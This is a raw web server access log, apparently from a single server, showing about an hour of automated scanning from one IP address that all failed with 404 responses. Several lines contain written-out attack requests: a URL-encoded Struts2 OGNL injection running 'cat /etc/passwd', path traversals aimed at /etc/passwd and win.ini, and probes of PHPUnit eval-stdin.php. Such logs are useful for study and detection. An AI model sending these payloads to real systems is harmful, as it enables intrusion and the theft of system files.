137.220.197.141 - - [21/Jan/2024:05:21:03 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:21:05 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:21:13 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:21:15 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:21:28 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:21:30 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:21:36 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:21:38 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:22:02 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:22:04 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:23:16 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:23:50 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:24:40 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:24:46 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:24:51 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:25:03 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:25:12 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:27:41 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:27:43 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:28:05 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:28:17 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:28:21 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:28:53 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:29:15 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:29:20 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:29:22 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:29:35 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:29:37 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:29:40 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:30:03 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:30:03 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:30:05 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:30:06 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:30:18 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:31:26 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:31:28 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:31:37 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:31:41 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:31:57 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:05 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:07 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:08 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:11 +0100] "GET /uir//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:15 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:17 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:19 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:32 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:32:55 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:08 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:08 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:11 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:12 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:30 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:32 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:37 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:56 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:33:58 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:34:56 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:09 +0100] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:17 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:17 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:20 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:29 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:40 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:42 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:35:42 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:36:06 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:36:08 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:36:35 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:37:34 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:37:40 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:37:42 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:38:00 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:38:10 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:38:20 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:39:27 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:39:36 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:39:45 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:39:47 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:39:56 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:39:58 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:40:08 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:40:24 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:40:49 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:40:49 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:40:51 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:41:08 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:41:10 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:41:41 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:41:43 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:42:06 +0100] "POST /system/sharedir.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:42:08 +0100] "POST /en/php/usb_sync.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:42:34 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:42:36 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:42:43 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:43:07 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:43:14 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:43:18 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:43:20 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:43:20 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:43:22 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:43:57 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:03 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:19 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:26 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:51 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:53 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:55 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:57 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:44:59 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:01 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:07 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:07 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:09 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:15 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:22 +0100] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:40 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:42 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:45:58 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:46:00 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:46:01 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:46:09 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:46:11 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:47:31 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:47:45 +0100] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:47:45 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:47:56 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:48:04 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:48:10 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:48:10 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:49:29 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:49:33 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:50:06 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:50:10 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:50:19 +0100] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:50:23 +0100] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:51:36 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:51:38 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:52:06 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:52:52 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:53:05 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:53:32 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:54:18 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:54:29 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:54:31 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:54:33 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:54:41 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:55:54 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:55:56 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:56:21 +0100] "GET /jkstatus HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:56:23 +0100] "GET /jkstatus; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:57:50 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:03 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:07 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:09 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:36 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:36 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:39 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:41 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:43 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:45 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:47 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:53 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:55 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:57 +0100] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:57 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:58:57 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:59:23 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:05:59:25 +0100] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:03 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:04 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:06 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:08 +0100] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:10 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:12 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:28 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:42 +0100] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:00:57 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
